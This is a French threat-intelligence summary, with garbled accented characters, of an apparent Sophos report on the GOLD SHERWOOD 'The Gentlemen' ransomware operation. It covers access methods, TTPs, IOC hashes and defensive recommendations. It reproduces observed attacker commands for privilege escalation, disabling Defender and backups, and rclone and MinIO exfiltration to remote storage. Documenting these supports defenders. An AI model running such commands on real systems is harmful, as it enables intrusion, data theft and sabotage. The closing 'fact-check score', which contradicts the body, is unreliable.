đ Contexte
PubliĂ© le 1er septembre 2026 par Sophos sur leur blog officiel, cet article prĂ©sente les conclusions des chercheurs de la Counter Threat Unitâą (CTU) concernant le groupe de menace GOLD SHERWOOD et son opĂ©ration ransomware-as-a-service (RaaS) The Gentlemen. L’analyse repose sur 15 intrusions distinctes investiguĂ©es par la CTU.
đŻ Acteur et modĂšle opĂ©ratoire
GOLD SHERWOOD exploite le schĂ©ma RaaS The Gentlemen depuis mi-2025, sur un modĂšle de double extorsion : vol de donnĂ©es avant chiffrement. Les premiĂšres victimes ont Ă©tĂ© publiĂ©es sur un site de fuite dĂ©diĂ© en septembre 2025, mois durant lequel une annonce de recrutement d’affiliĂ©s proposant un partage de rançon 90/10 est apparue sur le forum underground RAMP.
Volumétrie du site de fuite :
- Moins de 20 victimes par mois sur la fin 2025
- Moyenne supĂ©rieure Ă 75 par mois dĂšs le dĂ©but 2026, suggĂ©rant une hausse du nombre d’affiliĂ©s actifs
- 683 victimes cumulées fin juillet 2026, dont 169 pour le seul mois de juillet
La victimologie est typique d’une entreprise cybercriminelle opportuniste : tous secteurs confondus, les affiliĂ©s compromettent les organisations sur la seule base des accĂšs disponibles.
đ§ ChaĂźne d’attaque observĂ©e
1. AccĂšs initial
Les affiliĂ©s s’appuient sur l’exploitation de vulnĂ©rabilitĂ©s de pare-feux et l’abus d’identifiants VPN :
- Group-IB a dĂ©crit en mars la reconnaissance d’interfaces de management FortiGate exposĂ©es et vulnĂ©rables Ă CVE-2024-55591
- Des logs Rocket.Chat fuités en mai montraient le groupe testant des identifiants volés contre une série de services VPN
- La CTU a relevĂ© des artefacts suggĂ©rant l’exploitation d’Ă©quipements Fortinet, sans confirmation possible via la tĂ©lĂ©mĂ©trie
- Incident de fĂ©vrier : authentification sur un VPN SSL Fortinet avec des identifiants compromis, depuis une IP externe gĂ©olocalisĂ©e aux Pays-Bas. L’absence de MFA a permis l’accĂšs. Dans l’heure suivante, plusieurs sessions VPN ont Ă©tĂ© ouvertes depuis diffĂ©rentes IP Ă©trangĂšres â redondance opĂ©rationnelle et validation d’accĂšs prĂ©coces.
2. Mouvement latéral
Progression via RDP avec des comptes de domaine valides, en authentifications rapprochĂ©es vers plusieurs systĂšmes internes dont un serveur de fichiers et des contrĂŽleurs de domaine. L’accĂšs est maintenu par des reconnexions VPN rĂ©pĂ©tĂ©es.
3. Staging des outils
Les outils sont dĂ©posĂ©s dans C:\PerfLogs, rĂ©pertoire systĂšme lĂ©gitime rarement surveillĂ© : outils d’exfiltration et de sauvegarde, EDR killers et leurs drivers vulnĂ©rables, outils de dĂ©couverte. Autre rĂ©pertoire observĂ© : C:\Users\<username>\Documents\AVAST2\.
4. Découverte, accÚs aux identifiants et escalade de privilÚges
- ĂnumĂ©ration rĂ©seau via Advanced IP Scanner et SoftPerfect Network Scanner (exĂ©cutĂ© de façon rĂ©pĂ©tĂ©e sur de nombreux serveurs, en prĂ©paration du mouvement latĂ©ral et de l’exfiltration)
- Récupération du PID de LSASS :
tasklist /v /fo csv | findstr /i "lsass" - Usage de Mimikatz confirmé par des recherches tierces (absent de la télémétrie Sophos)
- Manipulation directe des groupes locaux et de domaine :
net1 localgroup administrators itadmin /addnet group "domain admins" ldap /add /domainnet user administrator qwertyu1 /domain
- Dans un incident, changement du mot de passe de deux comptes administrateurs pour verrouiller l’accĂšs et entraver la remĂ©diation
5. Persistance
- Installation d’un agent Cloudflared en tant que service Windows, exĂ©cutant
cloudflared.exevia un token valide â canal d’accĂšs distant discret et indĂ©pendant du VPN initial - DĂ©ploiement de Datto RMM sur un poste (rĂŽle exact non dĂ©terminĂ©)
- Dans au moins quatre incidents, activation de RDP au niveau systĂšme puis ouverture du port :
reg add HKLM\System\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /d 0 /fnetsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389
6. Exfiltration
Rclone est l’outil privilĂ©giĂ© (observĂ© dans 5 des 15 incidents), devant MEGAsync et FileZilla. Les paramĂštres sont ajustĂ©s pour limiter le volume et le bruit, avec des destinations distantes nommĂ©es d’aprĂšs la victime :
rclone copy s:\ wasabi1:<remote location> --transfers 8 --max-age 4y --include-from filter.txt -prclone copy E:\ <remote location> --transfers 8 --max-age 5y --include-from filter.txt -Prclone copy z:\ :<remote location> --include-from filter.txt -prclone copy ... remote:<remote location>/ -q --ignore-existingrclone copy --filter-from filter-file.txt "\\10.0.0.221\D$" remote:<remote location>/ -q --ignore-existing --auto-confirm --multi-thread-streams 8 --transfers 8 --max-age 8y --progress
Dans une intrusion, la stratĂ©gie s’est rĂ©vĂ©lĂ©e sĂ©quentielle et adaptative plutĂŽt que figĂ©e : aprĂšs une premiĂšre exfiltration Rclone depuis un lecteur mappĂ© (z:), bascule ~25 minutes plus tard vers Restic (restic init, puis inspection de notepad.exe c:\perflogs\restic-config.bat, puis restic backup z:\ --include-file=filter.txt et restic backup z:\ --exclude="*.exe"), puis usage du client MinIO (mc cp --recursive z:\ wasabi/...) vers du stockage objet.
7. Ăvasion des dĂ©fenses
EDR killers (BYOVD) â ESET a documentĂ© en juin 2026 la fourniture aux affiliĂ©s d’une suite d’outils exploitant des drivers vulnĂ©rables. Variantes observĂ©es par la CTU :
| Variante | Fichiers | Incidents |
|---|---|---|
| GentleKiller â Watchdog | bitd1.exe, bitd2.exe, bitdclear.exe, bitdlight.exe, y7d0.exe | 6 |
| GentleKiller â Javelin | eaanticheat1.exe, eaanticheat2.exe, eaanticheatclear.exe, eaanticheatlight.exe, EASOLO1.exe, EASolo1Light.exe, EASOLO2.exe, EASOLO2clear.exe | 6 |
| GentleKiller â G11 | g111.exe | 1 |
| GentleKiller â FACEIT Anti-Cheat | FaceITClear.exe | 1 |
| Havoc | acronis.exe, hwaudkiller.exe, sophos.exe, Sophos2.exe, Sophos3.exe | 2 |
| Xkpsm-Killer | x.exe | 2 |
L’outil open source Xkpsm-Killer n’avait jamais Ă©tĂ© observĂ© dans des compromissions The Gentlemen : tĂ©lĂ©chargement du driver vulnĂ©rable xkpsm.sys puis exĂ©cution de x.exe pour cibler les processus Sophos EDR (tentatives dĂ©tectĂ©es).
Neutralisation de Windows Defender :
powershell -command "Add-MpPreference -ExclusionPath C:\ -Force"(exclusion du disque C: entier)powershell -command "add-mppreference -exclusionprocess" c:\x\g_<file extension>_windows_amd64.exe -forcereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1- ExĂ©cution d’un script batch hĂ©bergĂ© sur le partage NETLOGON d’un contrĂŽleur de domaine pour une diffusion homogĂšne :
cmd.exe /c "\\NETLOGON\avkill.bat"
Sabotage des sauvegardes et destruction de traces :
- Plus de 200 variations de commandes
sc configvisant un large éventail de services de sauvegarde et de réplication, systématiquement juste avant le déploiement du ransomware :sc config VeeamBackupSvc start= disabledsc config SQLWriter start= disabledsc config BackupExecAgent start= disabled
- Effacement des journaux Application, SystÚme et Sécurité sur plusieurs hÎtes
8. Exécution et impact
GOLD SHERWOOD fournit un ransomware propriétaire décliné en versions Windows, Linux et ESXi ; seule la variante Windows a été déployée dans les incidents analysés (la variante ESXi a été téléchargée une fois, sans déploiement constaté).
Binaires écrits en Go, aux formats de nom :
locker_<file extension string>_windows_amd64.exeG_<file extension string>_windows_amd64.exedecryptor.exe
ParamÚtres en ligne de commande : --password (clé de chiffrement), --superfast / --ultrafast (vitesse), --keep (conservation des extensions), --path (ciblage distant via chemins UNC, ex. \\<IP>\c$\users).
DĂ©ploiement par exĂ©cution locale depuis les rĂ©pertoires de staging, mouvement latĂ©ral via PsExec, et distribution Ă l’Ă©chelle du domaine via les partages NETLOGON. Les fichiers chiffrĂ©s reçoivent une extension de six caractĂšres, souvent reprise dans le nom du binaire, et une note README-GENTLEMEN.txt est dĂ©posĂ©e dans tous les rĂ©pertoires affectĂ©s. La note contient un Tox ID, un Session ID et un lien .onion vers le blog de fuite, avec un compte Ă rebours de 239 heures.
⥠Temps de latence
Le dĂ©lai mĂ©dian entre la premiĂšre activitĂ© post-compromission observĂ©e et le dĂ©ploiement du ransomware est d’environ deux jours, le plus court Ă©tant infĂ©rieur Ă 24 heures.
đĄïž Recommandations
- Imposer le MFA sur les VPN et tous les services d’accĂšs distant
- Patcher rapidement les pare-feux et concentrateurs VPN exposés
- Restreindre et surveiller les modifications de groupes d’administration
- Limiter l’exposition RDP et alerter sur les modifications suspectes de registre, de rĂšgles pare-feu et d’exclusions Defender
- Surveiller les exécutions inhabituelles depuis
C:\PerfLogset rĂ©pertoires de staging assimilĂ©s - DĂ©tecter l’usage de Rclone, Restic, FileZilla, MEGAsync et MinIO Client
- Protéger les plateformes de sauvegarde contre les changements de configuration de service non autorisés
- Investiguer toute tentative de dĂ©sactivation d’outils de sĂ©curitĂ©, d’effacement de journaux ou de chargement de drivers vulnĂ©rables
đ Nature de l’article
Il s’agit d’une publication de recherche CTI dont le but principal est de documenter et partager les tactiques, techniques et procĂ©dures (TTPs) observĂ©es dans le cadre de l’opĂ©ration RaaS The Gentlemen afin d’alimenter la connaissance des dĂ©fenseurs.
đ§ TTPs et IOCs dĂ©tectĂ©s
Acteurs de menace
- GOLD SHERWOOD (cybercriminal) â orkl.eu
TTP
- T1190 â Exploit Public-Facing Application (Initial Access)
- T1133 â External Remote Services (Initial Access)
- T1078 â Valid Accounts (Defense Evasion)
- T1068 â Exploitation for Privilege Escalation (Privilege Escalation)
- T1021.001 â Remote Services: Remote Desktop Protocol (Lateral Movement)
- T1021.002 â Remote Services: SMB/Windows Admin Shares (Lateral Movement)
- T1569.002 â System Services: Service Execution (Execution)
- T1046 â Network Service Discovery (Discovery)
- T1057 â Process Discovery (Discovery)
- T1003.001 â OS Credential Dumping: LSASS Memory (Credential Access)
- T1098 â Account Manipulation (Persistence)
- T1136.001 â Create Account: Local Account (Persistence)
- T1531 â Account Access Removal (Impact)
- T1543.003 â Create or Modify System Process: Windows Service (Persistence)
- T1219 â Remote Access Software (Command and Control)
- T1112 â Modify Registry (Defense Evasion)
- T1562.001 â Impair Defenses: Disable or Modify Tools (Defense Evasion)
- T1562.004 â Impair Defenses: Disable or Modify System Firewall (Defense Evasion)
- T1070.001 â Indicator Removal: Clear Windows Event Logs (Defense Evasion)
- T1036 â Masquerading (Defense Evasion)
- T1074 â Data Staged (Collection)
- T1567.002 â Exfiltration to Cloud Storage (Exfiltration)
- T1048 â Exfiltration Over Alternative Protocol (Exfiltration)
- T1489 â Service Stop (Impact)
- T1490 â Inhibit System Recovery (Impact)
- T1486 â Data Encrypted for Impact (Impact)
Malware / Outils
- The Gentlemen (ransomware, Go, variantes Windows/Linux/ESXi)
- GentleKiller (EDR killer, variantes Watchdog / Javelin / G11 / FACEIT Anti-Cheat)
- Havoc (EDR killer)
- Xkpsm-Killer (EDR killer open source)
- Mimikatz (credential dumping)
- Rclone, Restic, MinIO Client (mc), MEGAsync, FileZilla (exfiltration)
- Advanced IP Scanner, SoftPerfect Network Scanner (découverte)
- Cloudflared, Datto RMM, PsExec (accÚs distant / exécution)
CVE
- CVE-2024-55591 â Fortinet FortiOS / FortiProxy (contournement d’authentification, interfaces de management exposĂ©es)
Indicateurs de compromission
EDR killers â acronis.exe
- MD5
622b2ca08552535bc142cb815ff9ec16 - SHA1
f0bc50d2d2838c5294e21cd9bce2f09bf581e508 - SHA256
a348f5fa048a09188bd706fd3d4efca978990caf3355ecfee501c9f1e19c0efd - MD5
4741a4976c6abfb3c80c170104518b6e - SHA1
be8c52474ab79a52af31e3cb2f71638299a0de1d - SHA256
ddba5b4e7a7ada77d56477e9d41c008f93e81d9a33ed09e77cb2af624fa694fe
EDR killers â acronis.exe / hwaudkiller.exe
- MD5
738df7ae0097f6bef93d65be5d4a2a26 - SHA1
c96baab9b7e7ef661921d44d7900f165c794ed25 - SHA256
1a9291ec869155336bf185d221d655d11c77a55ea0c8ecc0274202f74a90fcd1
EDR killer â y7D0.exe
- MD5
d8691ef15eea27cfefafeeb485286080 - SHA1
8bca55b3c9bfbdf68c9b6c72a7b1bf1dd6d5e3b2 - SHA256
3c71537b64487bbf4d1793f72c75d332650d09a77b71e4d884ff15c266a847f6
EDR killer â sophos.exe
- MD5
b23b653541bd95bdc4da07a0b07b57bf - SHA1
f0537cbb773ae12100b36731e7c39f5a9d852b14 - SHA256
50f2cdf16f05da9253fa2d6eb60d5a42da14c02c551c0874c9e953d4119da69c
EDR killer â sophos2.exe
- SHA256
bf7a2fb7f7256809dc690213b85f747cef8db7b909caf9783cac181912fb6207
EDR killer â sophos3.exe
- SHA256
761ce72420edf5e5531cdbad0e93397d7520cdead825886ca7f75cef76031720
EDR killer â g111.exe
- MD5
002417da707b93bf5ce3cb26d28005f6 - SHA1
8732c1ff565828a0bdef514b5dc0dfea40c1d1f2 - SHA256
81053c2c3be8b7dbf7d5087dba05c940b3ee4fd95524272651c816b72c5a9443
EDR killer â FaceITClear.exe
- SHA256
7a37acb031cddaa39ad20db0961baa5423ec53f318c49c9275c982507da76d6a
EDR killer â eaanticheat2.exe
- MD5
bc4a8d7bbbeb941265dfc954539326c0 - SHA1
b7cea81e6de895d01d01d20bd6dcfd347940b57f - SHA256
3a31ec3bf9b7eac6593a723145381f5d0f4ede076c4c8818d949a08f5596ff76
EDR killer â EAAntiCheatClear.exe
- SHA256
68031d549de399a44bb00614b910106baccef5996623b2f1102352a52a5bb444
EDR killers â famille EASOLO
- SHA1
058c3ff21e79770e4a60937c27b1ede227709248(EASOLO1.exe) - SHA1
9c0b05eb75f971cc25ee979e49b227b86b19e833(EASolo1Light.exe) - SHA1
a438ba2122a814320f47a056f04122f81c2ae6c5(EASOLO2.exe) - SHA1
a8ba89e67297642dcc1ae77433ab84e1f27d1792(EASOLO2clear.exe)
Drivers vulnĂ©rables (BYOVD) â nogbc.sys
- MD5
8ea97d01cbf459b94d134d05c54cd33e - SHA1
5c9bf6b7e4c7dc9b9227ce86e2d271d624c35147 - SHA256
0be8f415a485b11747bcfd71c9cd9781e090354728f076791ed6845b69ed78fb
Driver vulnĂ©rable (BYOVD) â G11.sys
- MD5
07e9f0b8627a95960e79e930fb099e84 - SHA1
56bee9df5833a637f5c54d5911df98b0812fe643 - SHA256
2d91a78e739891c9854c254f5b2a6b84c0e167dfa253466cbccd2cdd1c20145d
Driver vulnĂ©rable (BYOVD) â dmx.sys
- SHA256
ccdde8091d63eaafbe30d9f0482afd245abc10ab16e21ae9254e51e42cb80ae8
Autres artefacts
- Driver
xkpsm.sysassociĂ© Ăx.exe(Xkpsm-Killer) - Note de rançon :
README-GENTLEMEN.txt - Répertoires de staging :
C:\PerfLogs\,C:\Users\<username>\Documents\AVAST2\ - Script de désactivation AV :
\\NETLOGON\avkill.bat - Fichier de configuration :
c:\perflogs\restic-config.bat
Contre-mesures Sophos
ATK/KillAV-ENI, ATK/KillAV-HID, ATK/KillAV-HWA, ATK/KillAV-NC, ATK/KillAV-SKY, ATK/KillAV-SKZ, ATK/KillAV-SOP, Creds_4i, CXrep/MalGo-B, Evade_40g, Evade_66a, Prevent_2a, Troj/ABYSSW-B, Troj/HCrypt-E, W32/Neshta-D
đĄ Indice de vĂ©rification factuelle : 45/100 (moyenne)
- â sophos.com â source reconnue (liste interne) (20pts)
- â 773 chars â extrait court (5pts)
- ⏠aucun IOC extrait (0pts)
- ⏠pas d’IOC Ă vĂ©rifier (0pts)
- â 5 TTPs MITRE identifiĂ©es (15pts)
- ⏠date RSS ou approximée (0pts)
- â acteur(s) identifiĂ©(s) : GOLD SHERWOOD (5pts)
- ⏠pas de CVE à vérifier (0pts)
đ Source originale : https://www.sophos.com/en-us/blog/ungentlemanly-behavior-insights-into-a-ransomware-operation